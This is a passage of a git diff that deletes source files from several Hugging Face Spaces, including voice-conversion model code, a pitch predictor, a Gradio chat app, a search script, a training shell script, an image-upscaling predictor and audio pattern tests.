torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] * [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py b/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py deleted file mode 100644 index b2c592527a5966e6f8e79e8c52dc5b414246dcc6..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py +++ /dev/null @@ -1,97 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import parselmouth -import numpy as np - - -class PMF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def compute_f0(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0 - - def compute_f0_uv(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0, uv diff --git a/spaces/FathomNet/UWROV_Deepsea_Detector/README.md b/spaces/FathomNet/UWROV_Deepsea_Detector/README.md deleted file mode 100644 index 75fbdb51d23f215a6dd43489bf3da573ddb21fdd..0000000000000000000000000000000000000000 --- a/spaces/FathomNet/UWROV_Deepsea_Detector/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: UWROV Deepsea Detector -emoji: 🐠 -colorFrom: indigo -colorTo: gray -sdk: gradio -sdk_version: 3.8.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/FreeGPT/FreeGPT/app.py b/spaces/FreeGPT/FreeGPT/app.py deleted file mode 100644 index 83ec9df6fa7f825663827d8110a6cfa47076d23f..0000000000000000000000000000000000000000 --- a/spaces/FreeGPT/FreeGPT/app.py +++ /dev/null @@ -1,83 +0,0 @@ -from typing import List, Tuple, Dict, Generator -from langchain.llms import OpenAI -import gradio as gr - -model_name = "gpt-3.5-turbo" -LLM = OpenAI(model_name=model_name, temperature=0.1) - -def create_history_messages(history: List[Tuple[str, str]]) -> List[dict]: - history_messages = [{"role": "user", "content": m[0]} for m in history] - history_messages.extend([{"role": "assistant", "content": m[1]} for m in history]) - return history_messages - -def create_formatted_history(history_messages: List[dict]) -> List[Tuple[str, str]]: - formatted_history = [] - user_messages = [] - assistant_messages = [] - - for message in history_messages: - if message["role"] == "user": - user_messages.append(message["content"]) - elif message["role"] == "assistant": - assistant_messages.append(message["content"]) - - if user_messages and assistant_messages: - formatted_history.append( - ("".join(user_messages), "".join(assistant_messages)) - ) - user_messages = [] - assistant_messages = [] - - # append any remaining messages - if user_messages: - formatted_history.append(("".join(user_messages), None)) - elif assistant_messages: - formatted_history.append((None, "".join(assistant_messages))) - - return formatted_history - -def chat( - message: str, state: List[Dict[str, str]], client = LLM.client -) -> Generator[Tuple[List[Tuple[str, str]], List[Dict[str, str]]], None, None]: - history_messages = state - if history_messages == None: - history_messages = [] - history_messages.append({"role": "system", "content": "ChatDefense is available to assist you with your legal questions."}) - - history_messages.append({"role": "user", "content": message}) - # We have no content for the assistant's response yet but we will update this: - history_messages.append({"role": "assistant", "content": ""}) - - response_message = "" - - chat_generator = client.create( - messages=history_messages, stream=True, model=model_name - ) - - for chunk in chat_generator: - if "choices" in chunk: - for choice in chunk["choices"]: - if "delta" in choice and "content" in choice["delta"]: - new_token = choice["delta"]["content"] - # Add the latest token: - response_message += new_token - # Update the assistant's response in our model: - history_messages[-1]["content"] = response_message - - if "finish_reason" in choice and choice["finish_reason"] == "stop": - break - formatted_history = create_formatted_history(history_messages) - yield formatted_history, history_messages - -chatbot = gr.Chatbot(label="Chat").style(color_map=("yellow", "purple")) -iface = gr.Interface( - fn=chat, - inputs=[ - gr.Textbox(placeholder="Hello there 👋🏼 ", label="Message"), - "state", - ], - outputs=[chatbot, "state"], - allow_flagging="never", -) - -iface.queue().launch() \ No newline at end of file diff --git a/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py b/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py deleted file mode 100644 index 5d79839a8dd9879beedfb8658896f949dcb52832..0000000000000000000000000000000000000000 --- a/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py +++ /dev/null @@ -1,141 +0,0 @@ -import glob, os, sys; sys.path.append('../utils') - -#import needed libraries -import seaborn as sns -from pandas import DataFrame -from sentence_transformers import SentenceTransformer, CrossEncoder, util -# from keybert import KeyBERT -from transformers import pipeline -import matplotlib.pyplot as plt -import numpy as np -import streamlit as st -import pandas as pd -from rank_bm25 import BM25Okapi -from sklearn.feature_extraction import _stop_words -import string -from tqdm.autonotebook import tqdm -import numpy as np -import docx -from docx.shared import Inches -from docx.shared import Pt -from docx.enum.style import WD_STYLE_TYPE -import logging -logger = logging.getLogger(__name__) -import tempfile -import sqlite3 -import configparser - -### These are lexcial search related functions ##### - -def bm25_tokenizer(text): - tokenized_doc = [] - for token in text.lower().split(): - token = token.strip(string.punctuation) - - if len(token) > 0 and token not in _stop_words.ENGLISH_STOP_WORDS: - tokenized_doc.append(token) - return tokenized_doc - -def bm25TokenizeDoc(paraList): - tokenized_corpus = [] - ##########Commenting this for now########### will incorporate paragrpah splitting later. - # for passage in tqdm(paraList): - # if len(passage.split()) >256: - # # st.write("Splitting") - # temp = " ".join(passage.split()[:256]) - # tokenized_corpus.append(bm25_tokenizer(temp)) - # temp = " ".join(passage.split()[256:]) - # tokenized_corpus.append(bm25_tokenizer(temp)) - # else: - # tokenized_corpus.append(bm25_tokenizer(passage)) - ######################################################################################33333 - for passage in tqdm(paraList): - tokenized_corpus.append(bm25_tokenizer(passage)) - - return tokenized_corpus - -def lexical_search(keyword, document_bm25): - config = configparser.ConfigParser() - config.read_file(open('udfPreprocess/paramconfig.cfg')) - top_k = int(config.get('lexical_search','TOP_K')) - bm25_scores = document_bm25.get_scores(bm25_tokenizer(keyword)) - top_n = np.argpartition(bm25_scores, -top_k)[-top_k:] - bm25_hits = [{'corpus_id': idx, 'score': bm25_scores[idx]} for idx in top_n] - bm25_hits = sorted(bm25_hits, key=lambda x: x['score'], reverse=True) - return bm25_hits - -@st.cache(allow_output_mutation=True) -def load_sentenceTransformer(name): - return SentenceTransformer(name) - - -def semantic_search(keywordlist,paraList): - - ##### Sematic Search ##### - #query = "Does document contain {} issues ?".format(keyword) - config = configparser.ConfigParser() - config.read_file(open('udfPreprocess/paramconfig.cfg')) - model_name = config.get('semantic_search','MODEL_NAME') - - bi_encoder = load_sentenceTransformer(model_name) - bi_encoder.max_seq_length = int(config.get('semantic_search','MAX_SEQ_LENGTH')) #Truncate long passages to 256 tokens - top_k = int(config.get('semantic_search','TOP_K')) - document_embeddings = bi_encoder.encode(paraList, convert_to_tensor=True, show_progress_bar=False) - question_embedding = bi_encoder.encode(keywordlist, convert_to_tensor=True) - - hits = util.semantic_search(question_embedding, document_embeddings, top_k=top_k) - - return hits - -def show_results(keywordList): - document = docx.Document() - # document.add_heading('Document name:{}'.format(file_name), 2) - section = document.sections[0] - - # Calling the footer - footer = section.footer - - # Calling the paragraph already present in - # the footer section - footer_para = footer.paragraphs[0] - - font_styles = document.styles - font_charstyle = font_styles.add_style('CommentsStyle', WD_STYLE_TYPE.CHARACTER) - font_object = font_charstyle.font - font_object.size = Pt(7) - # Adding the centered zoned footer - footer_para.add_run('''\tPowered by GIZ Data and the Sustainable Development Solution Network hosted at Hugging-Face spaces: https://huggingface.co/spaces/ppsingh/streamlit_dev''', style='CommentsStyle') - document.add_heading('Your Seacrhed for {}'.format(keywordList), level=1) - for keyword in keywordList: - - st.write("Results for Query: {}".format(keyword)) - para = document.add_paragraph().add_run("Results for Query: {}".format(keyword)) - para.font.size = Pt(12) - bm25_hits, hits = search(keyword) - - st.markdown(""" - We will provide with 2 kind of results. The 'lexical search' and the semantic search. - """) - # In the semantic search part we provide two kind of results one with only Retriever (Bi-Encoder) and other the ReRanker (Cross Encoder) - st.markdown("Top few lexical search (BM25) hits") - document.add_paragraph("Top few lexical search (BM25) hits") - - for hit in bm25_hits[0:5]: - if hit['score'] > 0.00: - st.write("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - document.add_paragraph("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - - - - # st.table(bm25_hits[0:3]) - - st.markdown("\n-------------------------\n") - st.markdown("Top few Bi-Encoder Retrieval hits") - document.add_paragraph("\n-------------------------\n") - document.add_paragraph("Top few Bi-Encoder Retrieval hits") - - hits = sorted(hits, key=lambda x: x['score'], reverse=True) - for hit in hits[0:5]: - # if hit['score'] > 0.45: - st.write("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - document.add_paragraph("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) \ No newline at end of file diff --git a/spaces/GT4SD/PatentToolkit/README.md b/spaces/GT4SD/PatentToolkit/README.md deleted file mode 100644 index 854513ccaa55b11059022c52befe3b55c208fbca..0000000000000000000000000000000000000000 --- a/spaces/GT4SD/PatentToolkit/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: PatentToolkit -emoji: 💡 -colorFrom: green -colorTo: blue -sdk: gradio -sdk_version: 3.26.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh b/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh deleted file mode 100644 index 016d5ae0e8409e0db30b36c49fc745ae244a14b4..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh +++ /dev/null @@ -1,58 +0,0 @@ -#!/bin/bash - -DATA_DIR=$1 -TRAINTASK=${2-'[rainbow-stack,bowl-ball-placement]'} -STEPS=${3-'61000'} - -DISP=False - -echo "Training single-task dataset... Folder: $DATA_DIR Task $TRAINTASK" -trap "kill 0" SIGINT -# You can parallelize these depending on how much resources you have - -############################# -## Language-Conditioned Tasks -# [align-rope,assembling-kits-seq-seen-colors,assembling-kits-seq-unseen-colors,packing-shapes] - - -# TRAIN -python cliport/train.py train.task=$TRAINTASK \ - train.agent=cliport \ - train.model_task=$TRAINTASK \ - train.attn_stream_fusion_type=add \ - train.trans_stream_fusion_type=conv \ - train.lang_fusion_type=mult \ - train.n_demos=200 \ - train.n_steps=${STEPS} \ - dataset.cache=True \ - train.exp_folder=exps/exp-$TRAINTASK \ - dataset.type=single \ - train.load_from_last_ckpt=False - -# Convert Python list to Bash array -bash_array=$(python3 -c "import sys; print(' '.join((sys.argv[1])[1:-1].split(',')))" "$TRAINTASK") - -# # Convert the space-separated string to a bash array -# echo "Testing single-task dataset... Folder: $DATA_DIR Task $TASK" - - - -# echo "Testing $TASK" -# # TEST -# # bash scripts/generate_gpt_datasets.sh $DATA_DIR $task - -# python cliport/eval.py model_task=$TRAINTASK \ -# eval_task=$TRAINTASK \ -# agent=cliport \ -# mode=test \ -# n_demos=100 \ -# train_demos=200 \ -# checkpoint_type=test_best \ -# type=single \ -# exp_folder=exps/exp-$TRAINTASK \ -# update_results=True - -# # wait - -# python notebooks/print_results.py -r=exps/exp-$TRAINTASK/ --single -# echo "Finished Training." \ No newline at end of file diff --git a/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py b/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py deleted file mode 100644 index f314611be45d716664670fd39f90a1cfc18606e1..0000000000000000000000000000000000000000 --- a/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py +++ /dev/null @@ -1,219 +0,0 @@ -# flake8: noqa -# This file is used for deploying replicate models -# running: cog predict -i img=@inputs/00017_gray.png -i version='General - v3' -i scale=2 -i face_enhance=True -i tile=0 -# push: cog push r8.im/xinntao/realesrgan - -import os - -os.system("pip install gfpgan") -os.system("python setup.py develop") - -import cv2 -import shutil -import tempfile -import torch -from basicsr.archs.rrdbnet_arch import RRDBNet -from basicsr.archs.srvgg_arch import SRVGGNetCompact - -from realesrgan.utils import RealESRGANer - -try: - from cog import BasePredictor, Input, Path - from gfpgan import GFPGANer -except Exception: - print("please install cog and realesrgan package") - - -class Predictor(BasePredictor): - def setup(self): - os.makedirs("output", exist_ok=True) - # download weights - if not os.path.exists("weights/realesr-general-x4v3.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./weights" - ) - if not os.path.exists("weights/GFPGANv1.4.pth"): - os.system( - "wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./weights" - ) - if not os.path.exists("weights/RealESRGAN_x4plus.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P ./weights" - ) - if not os.path.exists("weights/RealESRGAN_x4plus_anime_6B.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P ./weights" - ) - if not os.path.exists("weights/realesr-animevideov3.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth -P ./weights" - ) - - def choose_model(self, scale, version, tile=0): - half = True if torch.cuda.is_available() else False - if version == "General - RealESRGANplus": - model = RRDBNet( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_block=23, - num_grow_ch=32, - scale=4, - ) - model_path = "weights/RealESRGAN_x4plus.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "General - v3": - model = SRVGGNetCompact( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_conv=32, - upscale=4, - act_type="prelu", - ) - model_path = "weights/realesr-general-x4v3.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "Anime - anime6B": - model = RRDBNet( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_block=6, - num_grow_ch=32, - scale=4, - ) - model_path = "weights/RealESRGAN_x4plus_anime_6B.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "AnimeVideo - v3": - model = SRVGGNetCompact( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_conv=16, - upscale=4, - act_type="prelu", - ) - model_path = "weights/realesr-animevideov3.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - - self.face_enhancer = GFPGANer( - model_path="weights/GFPGANv1.4.pth", - upscale=scale, - arch="clean", - channel_multiplier=2, - bg_upsampler=self.upsampler, - ) - - def predict( - self, - img: Path = Input(description="Input"), - version: str = Input( - description="RealESRGAN version. Please see [Readme] below for more descriptions", - choices=[ - "General - RealESRGANplus", - "General - v3", - "Anime - anime6B", - "AnimeVideo - v3", - ], - default="General - v3", - ), - scale: float = Input(description="Rescaling factor", default=2), - face_enhance: bool = Input( - description="Enhance faces with GFPGAN. Note that it does not work for anime images/vidoes", - default=False, - ), - tile: int = Input( - description="Tile size. Default is 0, that is no tile. When encountering the out-of-GPU-memory issue, please specify it, e.g., 400 or 200", - default=0, - ), - ) -> Path: - if tile <= 100 or tile is None: - tile = 0 - print( - f"img: {img}. version: {version}. scale: {scale}. face_enhance: {face_enhance}. tile: {tile}." - ) - try: - extension = os.path.splitext(os.path.basename(str(img)))[1] - img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) - if len(img.shape) == 3 and img.shape[2] == 4: - img_mode = "RGBA" - elif len(img.shape) == 2: - img_mode = None - img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) - else: - img_mode = None - - h, w = img.shape[0:2] - if h < 300: - img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) - - self.choose_model(scale, version, tile) - - try: - if face_enhance: - _, _, output = self.face_enhancer.enhance( - img, has_aligned=False, only_center_face=False, paste_back=True - ) - else: - output, _ = self.upsampler.enhance(img, outscale=scale) - except RuntimeError as error: - print("Error", error) - print( - 'If you encounter CUDA out of memory, try to set "tile" to a smaller size, e.g., 400.' - ) - - if img_mode == "RGBA": # RGBA images should be saved in png format - extension = "png" - # save_path = f'output/out.{extension}' - # cv2.imwrite(save_path, output) - out_path = Path(tempfile.mkdtemp()) / f"out.{extension}" - cv2.imwrite(str(out_path), output) - except Exception as error: - print("global exception: ", error) - finally: - clean_folder("output") - return out_path - - -def clean_folder(folder): - for filename in os.listdir(folder): - file_path = os.path.join(folder, filename) - try: - if os.path.isfile(file_path) or os.path.islink(file_path): - os.unlink(file_path) - elif os.path.isdir(file_path): - shutil.rmtree(file_path) - except Exception as e: - print(f"Failed to delete {file_path}. Reason: {e}") diff --git a/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py b/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py deleted file mode 100644 index b658f4779a369f9ec8dde692a61b7f0fe3485724..0000000000000000000000000000000000000000 --- a/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import pytest -import torch - -from audiocraft.modules.codebooks_patterns import ( - DelayedPatternProvider, - ParallelPatternProvider, - Pattern, - UnrolledPatternProvider, -) - - -class TestParallelPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == s - 1 # account for the 1st empty step - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_max_delay(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == 0 - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestDelayedPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - delays = [ - list(range(n_q)), - [0] + [1] * (n_q - 1), - [0] + [4] * (n_q - 1), - ] - for delay in delays: - provider = DelayedPatternProvider(n_q, delay) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + max(delay) + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = DelayedPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == max(0, s - code.q - 1) - - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - @pytest.mark.parametrize("delay", [[0, 1, 2, 3], [0, 1, 1, 1], [0, 3, 3, 3], [0, 3]]) - def test_pattern_max_delay(self, timesteps: int, delay: list): - provider = DelayedPatternProvider(len(delay), delay) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max(delay) - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestUnrolledPatternProvider: - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_get_pattern(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert len(pattern.layout) == provider.num_virtual_steps(timesteps) + max_delay - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_pattern_max_delay(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max_delay - - -class TestPattern: - - def ref_build_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to build the sequence from the pattern without using fancy scatter.""" - bs, n_q, T = z.shape - z = z.cpu().numpy() - assert n_q == pattern.n_q - assert T <= pattern.timesteps - inp = torch.full((bs, n_q, len(pattern.layout)), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < T: - inp[:, q, s] = z[:, q, t] - return torch.from_numpy(inp) - - def ref_revert_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to revert the sequence from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, n_q, S = z.shape - assert pattern.n_q == n_q - inp = torch.full((bs, pattern.n_q, pattern.timesteps), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < pattern.timesteps: - inp[:, q, t] = z[:, q, s] - return torch.from_numpy(inp) - - def ref_revert_pattern_logits(self, z: torch.Tensor, 